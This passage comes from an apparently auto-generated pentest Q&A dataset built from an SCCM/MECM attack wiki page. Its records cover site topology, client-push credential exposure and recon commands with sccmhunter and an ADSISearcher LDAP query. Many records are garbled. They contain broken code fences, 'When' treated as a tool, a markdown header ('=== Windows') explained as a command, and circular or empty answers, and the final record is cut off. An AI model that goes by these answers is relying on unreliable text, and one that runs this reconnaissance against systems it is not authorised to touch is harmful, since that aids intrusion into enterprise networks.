"docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM / MECM - Topology?"}, {"role": "assistant", "content": "SCCM operates in a client-server architecture deployed on a \"site\", representing the SCCM environment. The following components may be found in an SCCM installation:\n\n* Primary Site Server: the main SCCM server that manages clients (like distributing software updates) and can have child servers attached to it for scalability purposes. Each SCCM site is identified by a three-character code to distinguish it in an SCCM hierarchy.\n* Secondary Sites: child servers attached to a primary site server, generally deployed for scalability purposes.\n* Passive Site Server: a high-availability component that can be failovered to, if an active Site Server stops.\n* Management Point (MP): an SCCM server role that sits between the site server and clients, providing clients with necessary policies and configuration to communicate with the site server and receive configuration data from them. The management point also uses the site database to retrieve policies and configuration information needed by SCCM clients.\n* Distribution Point (DP): the SCCM component that hosts and distributes software packages, updates, OS images, etc. to clients upon request.\n* Site Database Server: a Microsoft SQL Server (MSSQL) instance that stores all information about clients, software updates, hardware and software inventories, configuration settings of the site, etc. This database is used by the site server to retrieve and store information about managed devices.\n* SMS Provider: provides a set of interfaces between the site server and the site database. It provides clients with valuable information such as available software updates, and allows those clients to communicate information (e.g. status of a software deployment, inventory data to store in the site database). \"SMS\" stands for \"System Management Service\".\n* Central Administration Site (CAS): an optional component used in large environments that host multiple SCCM sites (e.g. a huge company, with one SCCM site per continent). It manages all th"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM / MECM - Topology?", "response": "SCCM operates in a client-server architecture deployed on a \"site\", representing the SCCM environment. The following components may be found in an SCCM installation:\n\n* Primary Site Server: the main SCCM server that manages clients (like distributing software updates) and can have child servers attached to it for scalability purposes. Each SCCM site is identified by a three-character code to distinguish it in an SCCM hierarchy.\n* Secondary Sites: child servers attached to a primary site server, generally deployed for scalability purposes.\n* Passive Site Server: a high-availability component that can be failovered to, if an active Site Server stops.\n* Management Point (MP): an SCCM server role that sits between the site server and clients, providing clients with necessary policies and configuration to communicate with the site server and receive configuration data from them. The management point also uses the site database to retrieve policies and configuration information needed by SCCM clients.\n* Distribution Point (DP): the SCCM component that hosts and distributes software packages, updates, OS images, etc. to clients upon request.\n* Site Database Server: a Microsoft SQL Server (MSSQL) instance that stores all information about clients, software updates, hardware and software inventories, configuration settings of the site, etc. This database is used by the site server to retrieve and store information about managed devices.\n* SMS Provider: provides a set of interfaces between the site server and the site database. It provides clients with valuable information such as available software updates, and allows those clients to communicate information (e.g. status of a software deployment, inventory data to store in the site database). \"SMS\" stands for \"System Management Service\".\n* Central Administration Site (CAS): an optional component used in large environments that host multiple SCCM sites (e.g. a huge company, with one SCCM site per continent). It manages all th", "metadata": {"corpus_index": 987, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SCCM / MECM - Deployment types work?"}, {"role": "assistant", "content": "When SCCM is installed in an Active Directory, the clients can be deployed on the workstations by six different ways:\n\n* Client push installation (default)\n* Software update-based installation\n* Group Policy installation\n* Manual installation\n* Logon script installation\n* Package and program installation\n\n::: details Client push installation\nThe first way of deploying SCCM is the Client push installation method, which is the default one and the least secure.\n\nThis installation will use \"client push accounts\". They are service accounts with local administrative rights on the assets where SCCM will have to deploy some stuff. The system administrator creates groups of endpoints and for each of those, one \"client push account\". For each group, only one \"client push account\" can authenticate with administrator rights on the assets of this group. Thus, if an account is compromised, only the members of the corresponding group can be compromised in turn.\n\nWhen the SCCM deployment is launched, it will basically try to authenticate with each client push accounts on each asset, and if the authentication fails, SCCM will try the next account in line. When the authentication succeeds, it moves to the following asset, and so on until the deployment is complete.\n\nSCCM deployment via Client push installation is service accounts credentials spraying in a nutshell.\n\n_Nota bene, there is a_ _feature_ _(not enabled by default) allowing for automatic client push installation on all discovered clients in a boundary group in an SCCM site._\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SCCM / MECM - Deployment types work?", "response": "When SCCM is installed in an Active Directory, the clients can be deployed on the workstations by six different ways:\n\n* Client push installation (default)\n* Software update-based installation\n* Group Policy installation\n* Manual installation\n* Logon script installation\n* Package and program installation\n\n::: details Client push installation\nThe first way of deploying SCCM is the Client push installation method, which is the default one and the least secure.\n\nThis installation will use \"client push accounts\". They are service accounts with local administrative rights on the assets where SCCM will have to deploy some stuff. The system administrator creates groups of endpoints and for each of those, one \"client push account\". For each group, only one \"client push account\" can authenticate with administrator rights on the assets of this group. Thus, if an account is compromised, only the members of the corresponding group can be compromised in turn.\n\nWhen the SCCM deployment is launched, it will basically try to authenticate with each client push accounts on each asset, and if the authentication fails, SCCM will try the next account in line. When the authentication succeeds, it moves to the following asset, and so on until the deployment is complete.\n\nSCCM deployment via Client push installation is service accounts credentials spraying in a nutshell.\n\n_Nota bene, there is a_ _feature_ _(not enabled by default) allowing for automatic client push installation on all discovered clients in a boundary group in an SCCM site._\n:::", "metadata": {"corpus_index": 988, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM / MECM - Deployment types"}, {"role": "assistant", "content": "When SCCM is installed in an Active Directory, the clients can be deployed on the workstations by six different ways:\n\n* Client push installation (default)\n* Software update-based installation\n* Group Policy installation\n* Manual installation\n* Logon script installation\n* Package and program installation\n\n::: details Client push installation\nThe first way of deploying SCCM is the Client push installation method, which is the default one and the least secure.\n\nThis installation will use \"client push accounts\". They are service accounts with local administrative rights on the assets where SCCM will have to deploy some stuff. The system administrator creates groups of endpoints and for each of those, one \"client push account\". For each group, only one \"client push account\" can authenticate with administrator rights on the assets of this group. Thus, if an account is compromised, only the members of the corresponding group can be compromised in turn.\n\nWhen the SCCM deployment is launched, it will basically try to authenticate with each client push accounts on each asset, and if the authentication fails, SCCM will try the next account in line. When the authentication succeeds, it moves to the following asset, and so on until the deployment is complete.\n\nSCCM deployment via Client push installation is service accounts credentials spraying in a nutshell.\n\n_Nota bene, there is a_ _feature_ _(not enabled by default) allowing for automatic client push installation on all discovered clients in a boundary group in an SCCM site._\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM / MECM - Deployment types", "response": "When SCCM is installed in an Active Directory, the clients can be deployed on the workstations by six different ways:\n\n* Client push installation (default)\n* Software update-based installation\n* Group Policy installation\n* Manual installation\n* Logon script installation\n* Package and program installation\n\n::: details Client push installation\nThe first way of deploying SCCM is the Client push installation method, which is the default one and the least secure.\n\nThis installation will use \"client push accounts\". They are service accounts with local administrative rights on the assets where SCCM will have to deploy some stuff. The system administrator creates groups of endpoints and for each of those, one \"client push account\". For each group, only one \"client push account\" can authenticate with administrator rights on the assets of this group. Thus, if an account is compromised, only the members of the corresponding group can be compromised in turn.\n\nWhen the SCCM deployment is launched, it will basically try to authenticate with each client push accounts on each asset, and if the authentication fails, SCCM will try the next account in line. When the authentication succeeds, it moves to the following asset, and so on until the deployment is complete.\n\nSCCM deployment via Client push installation is service accounts credentials spraying in a nutshell.\n\n_Nota bene, there is a_ _feature_ _(not enabled by default) allowing for automatic client push installation on all discovered clients in a boundary group in an SCCM site._\n:::", "metadata": {"corpus_index": 988, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SCCM / MECM - Attack path overview"}, {"role": "assistant", "content": "![](<./assets/SCCM-Attack-Surface-Overview.png>)\n\nSCCM Attack Surface Overview{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SCCM / MECM - Attack path overview", "response": "![](<./assets/SCCM-Attack-Surface-Overview.png>)\n\nSCCM Attack Surface Overview{.caption}", "metadata": {"corpus_index": 989, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SCCM / MECM - Attack path overview"}, {"role": "assistant", "content": "![](<./assets/SCCM-Attack-Surface-Overview.png>)\n\nSCCM Attack Surface Overview{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SCCM / MECM - Attack path overview", "response": "![](<./assets/SCCM-Attack-Surface-Overview.png>)\n\nSCCM Attack Surface Overview{.caption}", "metadata": {"corpus_index": 989, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SCCM / MECM - Recon work?"}, {"role": "assistant", "content": "SCCM reconnaissance can be performed in many ways. The goal is to enumerate whether SCCM is present in a target network, and which are the assets related to it.\n\n::: tabs\n\n=== UNIX-like\n\npxethiefy.py (Python), which is based on PXEThief, can be used to query for PXE boot media. The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.\n\n![](<./assets/SCCM_Recon_Linux_pxethiefy.png>)\n\nThere are a few things to note:\n\n* pxethiefy.py uses broadcast requests to request DHCP PXE boot options. An SCCM setup does not have to support PXE boot and a \"found\" PXE server does not have to be an SCCM component. Be cautious of false positive results.\n* In this case a PXE server was found and PXE media was downloaded. The location of the PXE media on the TFTP server is \\SMSTemp\\..., which indicates that this is indeed an SCCM server.\n\nsccmhunter (Python) can also be used to explore the Active Directory and search for SCCM/MECM assets. For this tool, a first user account is required. The first step is to retrieve the different assets in the LDAP annuary, and extract information from the identified servers SMB shares.\n\nFor each server, the extracted information are :\n* the SCCM site code\n* if the server is a Central Administration Site (CAS) or not\n* the SMB signing status (useful to perform later NTLM relay attacks)\n* if the server is the SCCM Primary Site server or not\n* if it is the SCCM Distribution Point or not\n* if it is the SCCM SMS Provider or not\n* if there are the WSUS and MSSQL services running on it or not\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SCCM / MECM - Recon work?", "response": "SCCM reconnaissance can be performed in many ways. The goal is to enumerate whether SCCM is present in a target network, and which are the assets related to it.\n\n::: tabs\n\n=== UNIX-like\n\npxethiefy.py (Python), which is based on PXEThief, can be used to query for PXE boot media. The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.\n\n![](<./assets/SCCM_Recon_Linux_pxethiefy.png>)\n\nThere are a few things to note:\n\n* pxethiefy.py uses broadcast requests to request DHCP PXE boot options. An SCCM setup does not have to support PXE boot and a \"found\" PXE server does not have to be an SCCM component. Be cautious of false positive results.\n* In this case a PXE server was found and PXE media was downloaded. The location of the PXE media on the TFTP server is \\SMSTemp\\..., which indicates that this is indeed an SCCM server.\n\nsccmhunter (Python) can also be used to explore the Active Directory and search for SCCM/MECM assets. For this tool, a first user account is required. The first step is to retrieve the different assets in the LDAP annuary, and extract information from the identified servers SMB shares.\n\nFor each server, the extracted information are :\n* the SCCM site code\n* if the server is a Central Administration Site (CAS) or not\n* the SMB signing status (useful to perform later NTLM relay attacks)\n* if the server is the SCCM Primary Site server or not\n* if it is the SCCM Distribution Point or not\n* if it is the SCCM SMS Provider or not\n* if there are the WSUS and MSSQL services running on it or not\n\n```bash", "metadata": {"corpus_index": 990, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM / MECM - Recon?"}, {"role": "assistant", "content": "SCCM reconnaissance can be performed in many ways. The goal is to enumerate whether SCCM is present in a target network, and which are the assets related to it.\n\n::: tabs\n\n=== UNIX-like\n\npxethiefy.py (Python), which is based on PXEThief, can be used to query for PXE boot media. The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.\n\n![](<./assets/SCCM_Recon_Linux_pxethiefy.png>)\n\nThere are a few things to note:\n\n* pxethiefy.py uses broadcast requests to request DHCP PXE boot options. An SCCM setup does not have to support PXE boot and a \"found\" PXE server does not have to be an SCCM component. Be cautious of false positive results.\n* In this case a PXE server was found and PXE media was downloaded. The location of the PXE media on the TFTP server is \\SMSTemp\\..., which indicates that this is indeed an SCCM server.\n\nsccmhunter (Python) can also be used to explore the Active Directory and search for SCCM/MECM assets. For this tool, a first user account is required. The first step is to retrieve the different assets in the LDAP annuary, and extract information from the identified servers SMB shares.\n\nFor each server, the extracted information are :\n* the SCCM site code\n* if the server is a Central Administration Site (CAS) or not\n* the SMB signing status (useful to perform later NTLM relay attacks)\n* if the server is the SCCM Primary Site server or not\n* if it is the SCCM Distribution Point or not\n* if it is the SCCM SMS Provider or not\n* if there are the WSUS and MSSQL services running on it or not\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM / MECM - Recon?", "response": "SCCM reconnaissance can be performed in many ways. The goal is to enumerate whether SCCM is present in a target network, and which are the assets related to it.\n\n::: tabs\n\n=== UNIX-like\n\npxethiefy.py (Python), which is based on PXEThief, can be used to query for PXE boot media. The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program, the PC will use the network to read such a program from the PXE server.\n\n![](<./assets/SCCM_Recon_Linux_pxethiefy.png>)\n\nThere are a few things to note:\n\n* pxethiefy.py uses broadcast requests to request DHCP PXE boot options. An SCCM setup does not have to support PXE boot and a \"found\" PXE server does not have to be an SCCM component. Be cautious of false positive results.\n* In this case a PXE server was found and PXE media was downloaded. The location of the PXE media on the TFTP server is \\SMSTemp\\..., which indicates that this is indeed an SCCM server.\n\nsccmhunter (Python) can also be used to explore the Active Directory and search for SCCM/MECM assets. For this tool, a first user account is required. The first step is to retrieve the different assets in the LDAP annuary, and extract information from the identified servers SMB shares.\n\nFor each server, the extracted information are :\n* the SCCM site code\n* if the server is a Central Administration Site (CAS) or not\n* the SMB signing status (useful to perform later NTLM relay attacks)\n* if the server is the SCCM Primary Site server or not\n* if it is the SCCM Distribution Point or not\n* if it is the SCCM SMS Provider or not\n* if there are the WSUS and MSSQL services running on it or not\n\n```bash", "metadata": {"corpus_index": 990, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Find the assets in the LDAP configuration in the context of penetration testing"}, {"role": "assistant", "content": "sccmhunter.py find -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Find the assets in the LDAP configuration in the context of penetration testing", "response": "sccmhunter.py find -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC", "metadata": {"corpus_index": 991, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Find the assets in the LDAP configuration"}, {"role": "assistant", "content": "sccmhunter.py find -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Find the assets in the LDAP configuration", "response": "sccmhunter.py find -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC", "metadata": {"corpus_index": 991, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Retrieve informations regarding the identified servers and save PXE variables"}, {"role": "assistant", "content": "sccmhunter.py smb -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC -save\n``\n\nWhen information gathering is finished, the second step is to display the results with the show command:\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Retrieve informations regarding the identified servers and save PXE variables", "response": "sccmhunter.py smb -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC -save\n``\n\nWhen information gathering is finished, the second step is to display the results with the show command:\n\n``bash", "metadata": {"corpus_index": 992, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Retrieve informations regarding the identified servers and save PXE variables"}, {"role": "assistant", "content": "sccmhunter.py smb -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC -save\n``\n\nWhen information gathering is finished, the second step is to display the results with the show command:\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Retrieve informations regarding the identified servers and save PXE variables", "response": "sccmhunter.py smb -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC -save\n``\n\nWhen information gathering is finished, the second step is to display the results with the show command:\n\n``bash", "metadata": {"corpus_index": 992, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use When for retrieve informations regarding the identified servers and save pxe variables?"}, {"role": "assistant", "content": "When information gathering is finished, the second step is to display the results with the `show` command:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use When for retrieve informations regarding the identified servers and save pxe variables?", "response": "When information gathering is finished, the second step is to display the results with the `show` command:", "metadata": {"corpus_index": 993, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "When"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Retrieve informations regarding the identified servers and save PXE variables?"}, {"role": "assistant", "content": "When information gathering is finished, the second step is to display the results with the `show` command:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Retrieve informations regarding the identified servers and save PXE variables?", "response": "When information gathering is finished, the second step is to display the results with the `show` command:", "metadata": {"corpus_index": 993, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `When information gathering is finished, the second step is to display the results with the `show` command:`?"}, {"role": "assistant", "content": "This command is used for retrieve informations regarding the identified servers and save pxe variables. Retrieve informations regarding the identified servers and save PXE variables"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `When information gathering is finished, the second step is to display the results with the `show` command:`?", "response": "This command is used for retrieve informations regarding the identified servers and save pxe variables. Retrieve informations regarding the identified servers and save PXE variables", "metadata": {"corpus_index": 993, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about View everything?"}, {"role": "assistant", "content": "sccmhunter.py show -all\n``\n\n=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about View everything?", "response": "sccmhunter.py show -all\n``\n\n=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:\n\n``powershell", "metadata": {"corpus_index": 994, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for View everything?"}, {"role": "assistant", "content": "sccmhunter.py show -all\n``\n\n=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for View everything?", "response": "sccmhunter.py show -all\n``\n\n=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:\n\n``powershell", "metadata": {"corpus_index": 994, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for View everything?"}, {"role": "assistant", "content": "=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for View everything?", "response": "=== Windows\n\nUsing LDAP queries from a domain-joined Windows machine:", "metadata": {"corpus_index": 995, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for view everything. View everything"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for view everything. View everything", "metadata": {"corpus_index": 995, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe LDAP search via PS in the context of penetration testing"}, {"role": "assistant", "content": "(ADSISearcher).FindAll() | % {$_.Properties}\n``\n\n![](<./assets/SCCM_Recon_ADSI.png>)\n\nUsing WMI queries or SharpSCCM to query a clients local WMI database:\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe LDAP search via PS in the context of penetration testing", "response": "(ADSISearcher).FindAll() | % {$_.Properties}\n``\n\n![](<./assets/SCCM_Recon_ADSI.png>)\n\nUsing WMI queries or SharpSCCM to query a clients local WMI database:\n\n``powershell", "metadata": {"corpus_index": 996, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for LDAP search via PS"}, {"role": "assistant", "content": "(ADSISearcher).FindAll() | % {$_.Properties}\n``\n\n![](<./assets/SCCM_Recon_ADSI.png>)\n\nUsing WMI queries or SharpSCCM to query a clients local WMI database:\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for LDAP search via PS", "response": "(ADSISearcher).FindAll() | % {$_.Properties}\n``\n\n![](<./assets/SCCM_Recon_ADSI.png>)\n\nUsing WMI queries or SharpSCCM to query a clients local WMI database:\n\n``powershell", "metadata": {"corpus_index": 996, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform LDAP search via PS?"}, {"role": "assistant", "content": "![](<./assets/SCCM_Recon_ADSI.png>)\n\n\n\n\n\nUsing WMI queries or [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) to query a clients local WMI database:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform LDAP search via PS?", "response": "![](<./assets/SCCM_Recon_ADSI.png>)\n\n\n\n\n\nUsing WMI queries or [SharpSCCM](https://github.com/Mayyhem/SharpSCCM) to query a clients local WMI database:", "metadata": {"corpus_index": 997, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `![](<./assets/SCCM_Recon_ADSI.png>)`?"}, {"role": 